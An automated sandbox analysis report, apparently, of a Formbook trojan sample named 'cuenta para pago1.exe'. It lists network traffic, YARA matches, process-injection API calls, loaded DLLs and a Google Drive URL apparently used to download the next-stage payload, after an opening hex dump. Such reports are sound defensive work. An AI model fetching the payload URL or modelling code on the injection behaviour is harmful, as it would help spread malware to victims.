6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2 28 1a d2 a5 73
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            content-type: text/html
            last-modified: Thu, 23 Jun 2022 13:08:36 GMT
            etag: "999-62b465d4-7483b18151e2685e;br"
            accept-ranges: bytes
            content-encoding: br
            vary: Accept-Encoding
            content-length: 912
            date: Mon, 18 Mar 2024 14:08:48 GMT
            server: LiteSpeed
            platform: hostinger
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            content-type: text/html
            last-modified: Thu, 23 Jun 2022 13:08:36 GMT
            etag: "999-62b465d4-7483b18151e2685e;br"
            accept-ranges: bytes
            content-encoding: br
            vary: Accept-Encoding
            content-length: 912
            date: Mon, 18 Mar 2024 14:08:51 GMT
            server: LiteSpeed
            platform: hostinger
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Connection: close
            content-type: text/html
            last-modified: Thu, 23 Jun 2022 13:08:36 GMT
            etag: "999-62b465d4-7483b18151e2685e;;;"
            accept-ranges: bytes
            content-length: 2457
            date: Mon, 18 Mar 2024 14:08:53 GMT
            server: LiteSpeed
            platform: hostinger
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
            Date: Mon, 18 Mar 2024 14:08:59 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Server: namecheap-nginx
            Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
            Date: Mon, 18 Mar 2024 14:09:02 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Server: namecheap-nginx
            Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
            Date: Mon, 18 Mar 2024 14:09:04 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Server: namecheap-nginx
            Content-Encoding: gzip
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Date: Mon, 18 Mar 2024 14:09:21 GMT
            Server: Apache
            Content-Length: 389
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:09:35 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: br
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:09:38 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: br
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:09:40 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: br
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:09:43 GMT
            Content-Type: text/html; charset=iso-8859-1
            Content-Length: 203
            Connection: close
            Vary: Accept-Encoding
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 18 Mar 2024 14:10:01 GMT
            Connection: close
            Content-Length: 4956
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 18 Mar 2024 14:10:04 GMT
            Connection: close
            Content-Length: 4956
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 18 Mar 2024 14:10:07 GMT
            Connection: close
            Content-Length: 4956
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Cache-Control: private
            Content-Type: text/html; charset=utf-8
            Server: Microsoft-IIS/10.0
            X-Powered-By: ASP.NET
            Date: Mon, 18 Mar 2024 14:10:09 GMT
            Connection: close
            Content-Length: 5105
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:10:34 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:10:37 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:10:40 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx
            Date: Mon, 18 Mar 2024 14:10:43 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: cuenta para pago1.exe, 00000000.00000000.3658397167.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmp, cuenta para pago1.exe, 00000002.00000000.3957453711.0000000000409000.00000008.00000001.01000000.00000003.sdmp
        String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        String found in binary or memory: http://www.gopher.ftp://ftp.
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000626000.00000020.00000001.01000000.00000005.sdmp
        String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: https://drive.google.com/
        Source: cuenta para pago1.exe, 00000002.00000002.4199743170.0000000004920000.00000004.00001000.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198736310.000000000466E000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: https://drive.google.com/uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: https://drive.google.com/uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFydmQx
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: https://drive.usercontent.google.com/
        Source: cuenta para pago1.exe, 00000002.00000002.4198923341.0000000004688000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004688000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096502054.000000000467A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4198923341.000000000467C000.00000004.00000020.00020000.00000000.sdmp
        String found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download)
        Source: cuenta para pago1.exe, 00000002.00000003.4056696301.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096362930.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4096216292.000000000469A000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4056969680.00000000046A4000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4095703343.00000000046A6000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=downloadw
        Source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknown HTTPS traffic detected: 142.250.65.174:443 -> 192.168.11.30:49803 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.30:49804 version: TLS 1.2
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

        E-Banking Fraud

        Source: Yara match File source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000004.00000002.8749789268.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.8752868489.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.4215364100.0000000034570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.4216278898.0000000034BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.8751957709.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_349034E0 NtCreateMutant,LdrInitializeThunk,2_2_349034E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_34902D10
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_34902B90
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34904570 NtSuspendThread,2_2_34904570
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34904260 NtSetContextThread,2_2_34904260
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34903C90 NtOpenThread,2_2_34903C90
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902CD0 NtEnumerateKey,2_2_34902CD0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902CF0 NtDelayExecution,2_2_34902CF0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902C10 NtOpenProcess,2_2_34902C10
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34903C30 NtOpenProcessToken,2_2_34903C30
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902C30 NtMapViewOfSection,2_2_34902C30
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902C20 NtSetInformationFile,2_2_34902C20
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902C50 NtUnmapViewOfSection,2_2_34902C50
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902DA0 NtReadVirtualMemory,2_2_34902DA0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902DC0 NtAdjustPrivilegesToken,2_2_34902DC0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902D50 NtWriteVirtualMemory,2_2_34902D50
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902E80 NtCreateProcessEx,2_2_34902E80
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902EB0 NtProtectVirtualMemory,2_2_34902EB0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902ED0 NtResumeThread,2_2_34902ED0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902EC0 NtQuerySection,2_2_34902EC0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902E00 NtQueueApcThread,2_2_34902E00
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902E50 NtCreateSection,2_2_34902E50
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902FB0 NtSetValueKey,2_2_34902FB0
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902F00 NtCreateFile,2_2_34902F00
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 2_2_34902F30 NtOpenDirectoryObject,2_2_34902F30
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: String function: 348BB910 appears 149 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: String function: 34917BE4 appears 61 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: String function: 3494EF10 appears 79 times
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Code function: String function: 3493E692 appears 62 times
        Source: cuenta para pago1.exe Static PE information: invalid certificate
        Source: cuenta para pago1.exe, 00000002.00000003.4099312779.0000000034810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003465F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerasdlui.exej% vs cuenta para pago1.exe
        Source: cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034B60000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cuenta para pago1.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: oleacc.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: version.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\cuenta para pago1.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: rasdlg.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: mprapi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: rtutils.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\rasautou.exe Section loaded: urlmon.dll
